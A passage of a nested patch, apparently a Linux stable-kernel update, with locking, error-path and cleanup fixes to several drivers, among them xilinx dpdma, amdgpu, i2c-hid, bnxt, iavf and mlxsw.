+-	spin_lock_irqsave(&chan->vchan.lock, flags);
++	spin_lock_irqsave(&chan->lock, flags);
++	spin_lock(&chan->vchan.lock);
+ 	if (vchan_issue_pending(&chan->vchan))
+ 		xilinx_dpdma_chan_queue_transfer(chan);
+-	spin_unlock_irqrestore(&chan->vchan.lock, flags);
++	spin_unlock(&chan->vchan.lock);
++	spin_unlock_irqrestore(&chan->lock, flags);
+ }
+ 
+ static int xilinx_dpdma_config(struct dma_chan *dchan,
+@@ -1495,7 +1500,9 @@ static void xilinx_dpdma_chan_err_task(struct tasklet_struct *t)
+ 		    XILINX_DPDMA_EINTR_CHAN_ERR_MASK << chan->id);
+ 
+ 	spin_lock_irqsave(&chan->lock, flags);
++	spin_lock(&chan->vchan.lock);
+ 	xilinx_dpdma_chan_queue_transfer(chan);
++	spin_unlock(&chan->vchan.lock);
+ 	spin_unlock_irqrestore(&chan->lock, flags);
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+index 260e6a3316db0..7d5fbaaba72f7 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_amdkfd_gpuvm.c
+@@ -1779,6 +1779,7 @@ int amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu(
+ err_bo_create:
+ 	amdgpu_amdkfd_unreserve_mem_limit(adev, aligned_size, flags);
+ err_reserve_limit:
++	amdgpu_sync_free(&(*mem)->sync);
+ 	mutex_destroy(&(*mem)->lock);
+ 	if (gobj)
+ 		drm_gem_object_put(gobj);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+index 856db876af141..c7af36370b0de 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v5_2.c
+@@ -345,17 +345,21 @@ static void sdma_v5_2_ring_emit_hdp_flush(struct amdgpu_ring *ring)
+ 	u32 ref_and_mask = 0;
+ 	const struct nbio_hdp_flush_reg *nbio_hf_reg = adev->nbio.hdp_flush_reg;
+ 
+-	ref_and_mask = nbio_hf_reg->ref_and_mask_sdma0 << ring->me;
+-
+-	amdgpu_ring_write(ring, SDMA_PKT_HEADER_OP(SDMA_OP_POLL_REGMEM) |
+-			  SDMA_PKT_POLL_REGMEM_HEADER_HDP_FLUSH(1) |
+-			  SDMA_PKT_POLL_REGMEM_HEADER_FUNC(3)); /* == */
+-	amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_done_offset(adev)) << 2);
+-	amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_req_offset(adev)) << 2);
+-	amdgpu_ring_write(ring, ref_and_mask); /* reference */
+-	amdgpu_ring_write(ring, ref_and_mask); /* mask */
+-	amdgpu_ring_write(ring, SDMA_PKT_POLL_REGMEM_DW5_RETRY_COUNT(0xfff) |
+-			  SDMA_PKT_POLL_REGMEM_DW5_INTERVAL(10)); /* retry count, poll interval */
++	if (ring->me > 1) {
++		amdgpu_asic_flush_hdp(adev, ring);
++	} else {
++		ref_and_mask = nbio_hf_reg->ref_and_mask_sdma0 << ring->me;
++
++		amdgpu_ring_write(ring, SDMA_PKT_HEADER_OP(SDMA_OP_POLL_REGMEM) |
++				  SDMA_PKT_POLL_REGMEM_HEADER_HDP_FLUSH(1) |
++				  SDMA_PKT_POLL_REGMEM_HEADER_FUNC(3)); /* == */
++		amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_done_offset(adev)) << 2);
++		amdgpu_ring_write(ring, (adev->nbio.funcs->get_hdp_flush_req_offset(adev)) << 2);
++		amdgpu_ring_write(ring, ref_and_mask); /* reference */
++		amdgpu_ring_write(ring, ref_and_mask); /* mask */
++		amdgpu_ring_write(ring, SDMA_PKT_POLL_REGMEM_DW5_RETRY_COUNT(0xfff) |
++				  SDMA_PKT_POLL_REGMEM_DW5_INTERVAL(10)); /* retry count, poll interval */
++	}
+ }
+ 
+ /**
+diff --git a/drivers/hid/hid-logitech-dj.c b/drivers/hid/hid-logitech-dj.c
+index 08768e5accedc..57697605b2e24 100644
+--- a/drivers/hid/hid-logitech-dj.c
++++ b/drivers/hid/hid-logitech-dj.c
+@@ -965,9 +965,7 @@ static void logi_hidpp_dev_conn_notif_equad(struct hid_device *hdev,
+ 		}
+ 		break;
+ 	case REPORT_TYPE_MOUSE:
+-		workitem->reports_supported |= STD_MOUSE | HIDPP;
+-		if (djrcv_dev->type == recvr_type_mouse_only)
+-			workitem->reports_supported |= MULTIMEDIA;
++		workitem->reports_supported |= STD_MOUSE | HIDPP | MULTIMEDIA;
+ 		break;
+ 	}
+ }
+diff --git a/drivers/hid/i2c-hid/i2c-hid-core.c b/drivers/hid/i2c-hid/i2c-hid-core.c
+index 969f8eb086f02..0b05bb1e4410e 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-core.c
++++ b/drivers/hid/i2c-hid/i2c-hid-core.c
+@@ -61,7 +61,6 @@
+ /* flags */
+ #define I2C_HID_STARTED		0
+ #define I2C_HID_RESET_PENDING	1
+-#define I2C_HID_READ_PENDING	2
+ 
+ #define I2C_HID_PWR_ON		0x00
+ #define I2C_HID_PWR_SLEEP	0x01
+@@ -193,15 +192,10 @@ static int i2c_hid_xfer(struct i2c_hid *ihid,
+ 		msgs[n].len = recv_len;
+ 		msgs[n].buf = recv_buf;
+ 		n++;
+-
+-		set_bit(I2C_HID_READ_PENDING, &ihid->flags);
+ 	}
+ 
+ 	ret = i2c_transfer(client->adapter, msgs, n);
+ 
+-	if (recv_len)
+-		clear_bit(I2C_HID_READ_PENDING, &ihid->flags);
+-
+ 	if (ret != n)
+ 		return ret < 0 ? ret : -EIO;
+ 
+@@ -569,9 +563,6 @@ static irqreturn_t i2c_hid_irq(int irq, void *dev_id)
+ {
+ 	struct i2c_hid *ihid = dev_id;
+ 
+-	if (test_bit(I2C_HID_READ_PENDING, &ihid->flags))
+-		return IRQ_HANDLED;
+-
+ 	i2c_hid_get_input(ihid);
+ 
+ 	return IRQ_HANDLED;
+diff --git a/drivers/hid/intel-ish-hid/ipc/ipc.c b/drivers/hid/intel-ish-hid/ipc/ipc.c
+index a49c6affd7c4c..dd5fc60874ba1 100644
+--- a/drivers/hid/intel-ish-hid/ipc/ipc.c
++++ b/drivers/hid/intel-ish-hid/ipc/ipc.c
+@@ -948,6 +948,7 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 	if (!dev)
+ 		return NULL;
+ 
++	dev->devc = &pdev->dev;
+ 	ishtp_device_init(dev);
+ 
+ 	init_waitqueue_head(&dev->wait_hw_ready);
+@@ -983,7 +984,6 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 	}
+ 
+ 	dev->ops = &ish_hw_ops;
+-	dev->devc = &pdev->dev;
+ 	dev->mtu = IPC_PAYLOAD_SIZE - sizeof(struct ishtp_msg_hdr);
+ 	return dev;
+ }
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 5e3976ba52650..1ebc953799149 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -2075,13 +2075,18 @@ static int i2c_check_for_quirks(struct i2c_adapter *adap, struct i2c_msg *msgs,
+  * Returns negative errno, else the number of messages executed.
+  *
+  * Adapter lock must be held when calling this function. No debug logging
+- * takes place. adap->algo->master_xfer existence isn't checked.
++ * takes place.
+  */
+ int __i2c_transfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ {
+ 	unsigned long orig_jiffies;
+ 	int ret, try;
+ 
++	if (!adap->algo->master_xfer) {
++		dev_dbg(&adap->dev, "I2C level transfers not supported\n");
++		return -EOPNOTSUPP;
++	}
++
+ 	if (WARN_ON(!msgs || num < 1))
+ 		return -EINVAL;
+ 
+@@ -2148,11 +2153,6 @@ int i2c_transfer(struct i2c_adapter *adap, struct i2c_msg *msgs, int num)
+ {
+ 	int ret;
+ 
+-	if (!adap->algo->master_xfer) {
+-		dev_dbg(&adap->dev, "I2C level transfers not supported\n");
+-		return -EOPNOTSUPP;
+-	}
+-
+ 	/* REVISIT the fault reporting model here is weak:
+ 	 *
+ 	 *  - When we get an error after receiving N bytes from a slave,
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 4d03fb3a82460..f9ab5cfc9b947 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -4535,13 +4535,8 @@ static int its_vpe_irq_domain_alloc(struct irq_domain *domain, unsigned int virq
+ 		set_bit(i, bitmap);
+ 	}
+ 
+-	if (err) {
+-		if (i > 0)
+-			its_vpe_irq_domain_free(domain, virq, i);
+-
+-		its_lpi_free(bitmap, base, nr_ids);
+-		its_free_prop_table(vprop_page);
+-	}
++	if (err)
++		its_vpe_irq_domain_free(domain, virq, i);
+ 
+ 	return err;
+ }
+diff --git a/drivers/mmc/host/sdhci-msm.c b/drivers/mmc/host/sdhci-msm.c
+index a5ab2af3e5201..e37fb25577c0f 100644
+--- a/drivers/mmc/host/sdhci-msm.c
++++ b/drivers/mmc/host/sdhci-msm.c
+@@ -2831,6 +2831,11 @@ static __maybe_unused int sdhci_msm_runtime_suspend(struct device *dev)
+ 	struct sdhci_host *host = dev_get_drvdata(dev);
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_msm_host *msm_host = sdhci_pltfm_priv(pltfm_host);
++	unsigned long flags;
++
++	spin_lock_irqsave(&host->lock, flags);
++	host->runtime_suspended = true;
++	spin_unlock_irqrestore(&host->lock, flags);
+ 
+ 	/* Drop the performance vote */
+ 	dev_pm_opp_set_rate(dev, 0);
+@@ -2845,6 +2850,7 @@ static __maybe_unused int sdhci_msm_runtime_resume(struct device *dev)
+ 	struct sdhci_host *host = dev_get_drvdata(dev);
+ 	struct sdhci_pltfm_host *pltfm_host = sdhci_priv(host);
+ 	struct sdhci_msm_host *msm_host = sdhci_pltfm_priv(pltfm_host);
++	unsigned long flags;
+ 	int ret;
+ 
+ 	ret = clk_bulk_prepare_enable(ARRAY_SIZE(msm_host->bulk_clks),
+@@ -2863,7 +2869,15 @@ static __maybe_unused int sdhci_msm_runtime_resume(struct device *dev)
+ 
+ 	dev_pm_opp_set_rate(dev, msm_host->clk_rate);
+ 
+-	return sdhci_msm_ice_resume(msm_host);
++	ret = sdhci_msm_ice_resume(msm_host);
++	if (ret)
++		return ret;
++
++	spin_lock_irqsave(&host->lock, flags);
++	host->runtime_suspended = false;
++	spin_unlock_irqrestore(&host->lock, flags);
++
++	return ret;
+ }
+ 
+ static const struct dev_pm_ops sdhci_msm_pm_ops = {
+diff --git a/drivers/mtd/nand/raw/diskonchip.c b/drivers/mtd/nand/raw/diskonchip.c
+index 5d2ddb037a9a2..2068025d56396 100644
+--- a/drivers/mtd/nand/raw/diskonchip.c
++++ b/drivers/mtd/nand/raw/diskonchip.c
+@@ -53,7 +53,7 @@ static unsigned long doc_locations[] __initdata = {
+ 	0xe8000, 0xea000, 0xec000, 0xee000,
+ #endif
+ #endif
+-	0xffffffff };
++};
+ 
+ static struct mtd_info *doclist = NULL;
+ 
+@@ -1552,7 +1552,7 @@ static int __init init_nanddoc(void)
+ 		if (ret < 0)
+ 			return ret;
+ 	} else {
+-		for (i = 0; (doc_locations[i] != 0xffffffff); i++) {
++		for (i = 0; i < ARRAY_SIZE(doc_locations); i++) {
+ 			doc_probe(doc_locations[i]);
+ 		}
+ 	}
+diff --git a/drivers/net/ethernet/broadcom/b44.c b/drivers/net/ethernet/broadcom/b44.c
+index 7f876721596c1..5b6209f5a8017 100644
+--- a/drivers/net/ethernet/broadcom/b44.c
++++ b/drivers/net/ethernet/broadcom/b44.c
+@@ -2033,12 +2033,14 @@ static int b44_set_pauseparam(struct net_device *dev,
+ 		bp->flags |= B44_FLAG_TX_PAUSE;
+ 	else
+ 		bp->flags &= ~B44_FLAG_TX_PAUSE;
+-	if (bp->flags & B44_FLAG_PAUSE_AUTO) {
+-		b44_halt(bp);
+-		b44_init_rings(bp);
+-		b44_init_hw(bp, B44_FULL_RESET);
+-	} else {
+-		__b44_set_flow_ctrl(bp, bp->flags);
++	if (netif_running(dev)) {
++		if (bp->flags & B44_FLAG_PAUSE_AUTO) {
++			b44_halt(bp);
++			b44_init_rings(bp);
++			b44_init_hw(bp, B44_FULL_RESET);
++		} else {
++			__b44_set_flow_ctrl(bp, bp->flags);
++		}
+ 	}
+ 	spin_unlock_irq(&bp->lock);
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 0d0aad7141c15..77ea19bcdc6fe 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -1697,7 +1697,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		skb = bnxt_copy_skb(bnapi, data_ptr, len, mapping);
+ 		if (!skb) {
+ 			bnxt_abort_tpa(cpr, idx, agg_bufs);
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 	} else {
+@@ -1707,7 +1707,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		new_data = __bnxt_alloc_rx_frag(bp, &new_mapping, GFP_ATOMIC);
+ 		if (!new_data) {
+ 			bnxt_abort_tpa(cpr, idx, agg_bufs);
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 
+@@ -1723,7 +1723,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		if (!skb) {
+ 			skb_free_frag(data);
+ 			bnxt_abort_tpa(cpr, idx, agg_bufs);
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 		skb_reserve(skb, bp->rx_offset);
+@@ -1734,7 +1734,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		skb = bnxt_rx_agg_pages_skb(bp, cpr, skb, idx, agg_bufs, true);
+ 		if (!skb) {
+ 			/* Page reuse already handled by bnxt_rx_pages(). */
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 	}
+@@ -1950,11 +1950,8 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 			u32 frag_len = bnxt_rx_agg_pages_xdp(bp, cpr, &xdp,
+ 							     cp_cons, agg_bufs,
+ 							     false);
+-			if (!frag_len) {
+-				cpr->sw_stats.rx.rx_oom_discards += 1;
+-				rc = -ENOMEM;
+-				goto next_rx;
+-			}
++			if (!frag_len)
++				goto oom_next_rx;
+ 		}
+ 		xdp_active = true;
+ 	}
+@@ -1977,9 +1974,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 				else
+ 					bnxt_xdp_buff_frags_free(rxr, &xdp);
+ 			}
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
+-			rc = -ENOMEM;
+-			goto next_rx;
++			goto oom_next_rx;
+ 		}
+ 	} else {
+ 		u32 payload;
+@@ -1990,29 +1985,21 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 			payload = 0;
+ 		skb = bp->rx_skb_func(bp, rxr, cons, data, data_ptr, dma_addr,
+ 				      payload | len);
+-		if (!skb) {
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
+-			rc = -ENOMEM;
+-			goto next_rx;
+-		}
++		if (!skb)
++			goto oom_next_rx;
+ 	}
+ 
+ 	if (agg_bufs) {
+ 		if (!xdp_active) {
+ 			skb = bnxt_rx_agg_pages_skb(bp, cpr, skb, cp_cons, agg_bufs, false);
+-			if (!skb) {
+-				cpr->sw_stats.rx.rx_oom_discards += 1;
+-				rc = -ENOMEM;
+-				goto next_rx;
+-			}
++			if (!skb)
++				goto oom_next_rx;
+ 		} else {
+ 			skb = bnxt_xdp_build_skb(bp, skb, agg_bufs, rxr->page_pool, &xdp, rxcmp1);
+ 			if (!skb) {
+ 				/* we should be able to free the old skb here */
+ 				bnxt_xdp_buff_frags_free(rxr, &xdp);
+-				cpr->sw_stats.rx.rx_oom_discards += 1;
+-				rc = -ENOMEM;
+-				goto next_rx;
++				goto oom_next_rx;
+ 			}
+ 		}
+ 	}
+@@ -2090,6 +2077,11 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	*raw_cons = tmp_raw_cons;
+ 
+ 	return rc;
++
++oom_next_rx:
++	cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
++	rc = -ENOMEM;
++	goto next_rx;
+ }
+ 
+ /* In netpoll mode, if we are using a combined completion ring, we need to
+@@ -2135,7 +2127,7 @@ static int bnxt_force_rx_discard(struct bnxt *bp,
+ 	}
+ 	rc = bnxt_rx_pkt(bp, cpr, raw_cons, event);
+ 	if (rc && rc != -EBUSY)
+-		cpr->sw_stats.rx.rx_netpoll_discards += 1;
++		cpr->bnapi->cp_ring.sw_stats.rx.rx_netpoll_discards += 1;
+ 	return rc;
+ }
+ 
+@@ -11812,6 +11804,16 @@ static void bnxt_rx_ring_reset(struct bnxt *bp)
+ 	bnxt_rtnl_unlock_sp(bp);
+ }
+ 
++static void bnxt_fw_fatal_close(struct bnxt *bp)
++{
++	bnxt_tx_disable(bp);
++	bnxt_disable_napi(bp);
++	bnxt_disable_int_sync(bp);
++	bnxt_free_irq(bp);
++	bnxt_clear_int_mode(bp);
++	pci_disable_device(bp->pdev);
++}
++
+ static void bnxt_fw_reset_close(struct bnxt *bp)
+ {
+ 	bnxt_ulp_stop(bp);
+@@ -11825,12 +11827,7 @@ static void bnxt_fw_reset_close(struct bnxt *bp)
+ 		pci_read_config_word(bp->pdev, PCI_SUBSYSTEM_ID, &val);
+ 		if (val == 0xffff)
+ 			bp->fw_reset_min_dsecs = 0;
+-		bnxt_tx_disable(bp);
+-		bnxt_disable_napi(bp);
+-		bnxt_disable_int_sync(bp);
+-		bnxt_free_irq(bp);
+-		bnxt_clear_int_mode(bp);
+-		pci_disable_device(bp->pdev);
++		bnxt_fw_fatal_close(bp);
+ 	}
+ 	__bnxt_close_nic(bp, true, false);
+ 	bnxt_vf_reps_free(bp);
+@@ -13978,6 +13975,7 @@ static pci_ers_result_t bnxt_io_error_detected(struct pci_dev *pdev,
+ {
+ 	struct net_device *netdev = pci_get_drvdata(pdev);
+ 	struct bnxt *bp = netdev_priv(netdev);
++	bool abort = false;
+ 
+ 	netdev_info(netdev, "PCI I/O error detected\n");
+ 
+@@ -13986,16 +13984,27 @@ static pci_ers_result_t bnxt_io_error_detected(struct pci_dev *pdev,
+ 
+ 	bnxt_ulp_stop(bp);
+ 
+-	if (state == pci_channel_io_perm_failure) {
++	if (test_and_set_bit(BNXT_STATE_IN_FW_RESET, &bp->state)) {
++		netdev_err(bp->dev, "Firmware reset already in progress\n");
++		abort = true;
++	}
++
++	if (abort || state == pci_channel_io_perm_failure) {
+ 		rtnl_unlock();
+ 		return PCI_ERS_RESULT_DISCONNECT;
+ 	}
+ 
+-	if (state == pci_channel_io_frozen)
++	/* Link is not reliable anymore if state is pci_channel_io_frozen
++	 * so we disable bus master to prevent any potential bad DMAs before
++	 * freeing kernel memory.
++	 */
++	if (state == pci_channel_io_frozen) {
+ 		set_bit(BNXT_STATE_PCI_CHANNEL_IO_FROZEN, &bp->state);
++		bnxt_fw_fatal_close(bp);
++	}
+ 
+ 	if (netif_running(netdev))
+-		bnxt_close(netdev);
++		__bnxt_close_nic(bp, true, true);
+ 
+ 	if (pci_is_enabled(pdev))
+ 		pci_disable_device(pdev);
+@@ -14081,6 +14090,7 @@ static pci_ers_result_t bnxt_io_slot_reset(struct pci_dev *pdev)
+ 	}
+ 
+ reset_exit:
++	clear_bit(BNXT_STATE_IN_FW_RESET, &bp->state);
+ 	bnxt_clear_reservations(bp, true);
+ 	rtnl_unlock();
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index a9db1ed74d3fc..9efd4b962dce2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -16173,8 +16173,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	val = (rd32(&pf->hw, I40E_PRTGL_SAH) &
+ 	       I40E_PRTGL_SAH_MFS_MASK) >> I40E_PRTGL_SAH_MFS_SHIFT;
+ 	if (val < MAX_FRAME_SIZE_DEFAULT)
+-		dev_warn(&pdev->dev, "MFS for port %x has been set below the default: %x\n",
+-			 pf->hw.port, val);
++		dev_warn(&pdev->dev, "MFS for port %x (%d) has been set below the default (%d)\n",
++			 pf->hw.port, val, MAX_FRAME_SIZE_DEFAULT);
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+@@ -16716,7 +16716,7 @@ static int __init i40e_init_module(void)
+ 	 * since we need to be able to guarantee forward progress even under
+ 	 * memory pressure.
+ 	 */
+-	i40e_wq = alloc_workqueue("%s", WQ_MEM_RECLAIM, 0, i40e_driver_name);
++	i40e_wq = alloc_workqueue("%s", 0, 0, i40e_driver_name);
+ 	if (!i40e_wq) {
+ 		pr_err("%s: Failed to create workqueue\n", i40e_driver_name);
+ 		return -ENOMEM;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index b9c4b311cd625..53b9fe35d8035 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -3631,6 +3631,34 @@ static void iavf_del_all_cloud_filters(struct iavf_adapter *adapter)
+ 	spin_unlock_bh(&adapter->cloud_filter_list_lock);
+ }
+ 
++/**
++ * iavf_is_tc_config_same - Compare the mqprio TC config with the
++ * TC config already configured on this adapter.
++ * @adapter: board private structure
++ * @mqprio_qopt: TC config received from kernel.
++ *
++ * This function compares the TC config received from the kernel
++ * with the config already configured on the adapter.
++ *
++ * Return: True if configuration is same, false otherwise.
++ **/
++static bool iavf_is_tc_config_same(struct iavf_adapter *adapter,
++				   struct tc_mqprio_qopt *mqprio_qopt)
++{
++	struct virtchnl_channel_info *ch = &adapter->ch_config.ch_info[0];
++	int i;
++
++	if (adapter->num_tc != mqprio_qopt->num_tc)
++		return false;
++
++	for (i = 0; i < adapter->num_tc; i++) {
++		if (ch[i].count != mqprio_qopt->count[i] ||
++		    ch[i].offset != mqprio_qopt->offset[i])
++			return false;
++	}
++	return true;
++}
++
+ /**
+  * __iavf_setup_tc - configure multiple traffic classes
+  * @netdev: network interface device structure
+@@ -3688,7 +3716,7 @@ static int __iavf_setup_tc(struct net_device *netdev, void *type_data)
+ 		if (ret)
+ 			return ret;
+ 		/* Return if same TC config is requested */
+-		if (adapter->num_tc == num_tc)
++		if (iavf_is_tc_config_same(adapter, &mqprio_qopt->qopt))
+ 			return 0;
+ 		adapter->num_tc = num_tc;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index a7832a0180ee6..48cf691842b54 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -1703,6 +1703,7 @@ static const struct macsec_ops macsec_offload_ops = {
+ 	.mdo_add_secy = mlx5e_macsec_add_secy,
+ 	.mdo_upd_secy = mlx5e_macsec_upd_secy,
+ 	.mdo_del_secy = mlx5e_macsec_del_secy,
++	.rx_uses_md_dst = true,
+ };
+ 
+ bool mlx5e_macsec_handle_tx_skb(struct mlx5e_macsec *macsec, struct sk_buff *skb)
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core.c b/drivers/net/ethernet/mellanox/mlxsw/core.c
+index e2a985ec2c765..f36a416ffcfe9 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core.c
+@@ -792,7 +792,7 @@ static void mlxsw_emad_rx_listener_func(struct sk_buff *skb, u16 local_port,
+ 
+ static const struct mlxsw_listener mlxsw_emad_rx_listener =
+ 	MLXSW_RXL(mlxsw_emad_rx_listener_func, ETHEMAD, TRAP_TO_CPU, false,
+-		  EMAD, DISCARD);
++		  EMAD, FORWARD);
+ 
+ static int mlxsw_emad_init(struct mlxsw_core *mlxsw_core)
+ {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+index 41eac7dfb67e7..685bcf8cbfa9a 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+@@ -780,7 +780,9 @@ static void mlxsw_sp_acl_tcam_vregion_rehash_work(struct work_struct *work)
+ 			     rehash.dw.work);
+ 	int credits = MLXSW_SP_ACL_TCAM_VREGION_REHASH_CREDITS;
+ 
++	mutex_lock(&vregion->lock);
+ 	mlxsw_sp_acl_tcam_vregion_rehash(vregion->mlxsw_sp, vregion, &credits);
++	mutex_unlock(&vregion->lock);
+ 	if (credits < 0)
+ 		/* Rehash gone out of credits so it was interrupted.
+ 		 * Schedule the work as soon as possible to continue.
+@@ -790,6 +792,17 @@ static void mlxsw_sp_acl_tcam_vregion_rehash_work(struct work_struct *work)
+ 		mlxsw_sp_acl_tcam_vregion_rehash_work_schedule(vregion);
+ }
+ 
++static void
++mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(struct mlxsw_sp_acl_tcam_rehash_ctx *ctx)
++{
++	/* The entry markers are relative to the current chunk and therefore
++	 * needs to be reset together with the chunk marker.
++	 */
++	ctx->current_vchunk = NULL;
++	ctx->start_ventry = NULL;
++	ctx->stop_ventry = NULL;
++}
++
+ static void
+ mlxsw_sp_acl_tcam_rehash_ctx_vchunk_changed(struct mlxsw_sp_acl_tcam_vchunk *vchunk)
+ {
+@@ -812,7 +825,7 @@ mlxsw_sp_acl_tcam_rehash_ctx_vregion_changed(struct mlxsw_sp_acl_tcam_vregion *v
+ 	 * the current chunk pointer to make sure all chunks
+ 	 * are properly migrated.
+ 	 */
+-	vregion->rehash.ctx.current_vchunk = NULL;
++	mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(&vregion->rehash.ctx);
+ }
+ 
+ static struct mlxsw_sp_acl_tcam_vregion *
+@@ -885,10 +898,14 @@ mlxsw_sp_acl_tcam_vregion_destroy(struct mlxsw_sp *mlxsw_sp,
+ 	struct mlxsw_sp_acl_tcam *tcam = vregion->tcam;
+ 
+ 	if (vgroup->vregion_rehash_enabled && ops->region_rehash_hints_get) {
++		struct mlxsw_sp_acl_tcam_rehash_ctx *ctx = &vregion->rehash.ctx;
++
+ 		mutex_lock(&tcam->lock);
+ 		list_del(&vregion->tlist);
+ 		mutex_unlock(&tcam->lock);
+-		cancel_delayed_work_sync(&vregion->rehash.dw);
++		if (cancel_delayed_work_sync(&vregion->rehash.dw) &&
++		    ctx->hints_priv)
++			ops->region_rehash_hints_put(ctx->hints_priv);
+ 	}
+ 	mlxsw_sp_acl_tcam_vgroup_vregion_detach(mlxsw_sp, vregion);
+ 	if (vregion->region2)
+@@ -1254,8 +1271,14 @@ mlxsw_sp_acl_tcam_ventry_activity_get(struct mlxsw_sp *mlxsw_sp,
+ 				      struct mlxsw_sp_acl_tcam_ventry *ventry,
+ 				      bool *activity)
+ {
+-	return mlxsw_sp_acl_tcam_entry_activity_get(mlxsw_sp,
+-						    ventry->entry, activity);
++	struct mlxsw_sp_acl_tcam_vregion *vregion = ventry->vchunk->vregion;
++	int err;
++
++	mutex_lock(&vregion->lock);
++	err = mlxsw_sp_acl_tcam_entry_activity_get(mlxsw_sp, ventry->entry,
++						   activity);
++	mutex_unlock(&vregion->lock);
++	return err;
+ }
+ 
+ static int
+@@ -1289,6 +1312,8 @@ mlxsw_sp_acl_tcam_vchunk_migrate_start(struct mlxsw_sp *mlxsw_sp,
+ {
+ 	struct mlxsw_sp_acl_tcam_chunk *new_chunk;
+ 
++	WARN_ON(vchunk->chunk2);
++
+ 	new_chunk = mlxsw_sp_acl_tcam_chunk_create(mlxsw_sp, vchunk, region);
+ 	if (IS_ERR(new_chunk))
+ 		return PTR_ERR(new_chunk);
+@@ -1307,7 +1332,7 @@ mlxsw_sp_acl_tcam_vchunk_migrate_end(struct mlxsw_sp *mlxsw_sp,
+ {
+ 	mlxsw_sp_acl_tcam_chunk_destroy(mlxsw_sp, vchunk->chunk2);
+ 	vchunk->chunk2 = NULL;
+-	ctx->current_vchunk = NULL;
++	mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(ctx);
+ }
+ 
+ static int
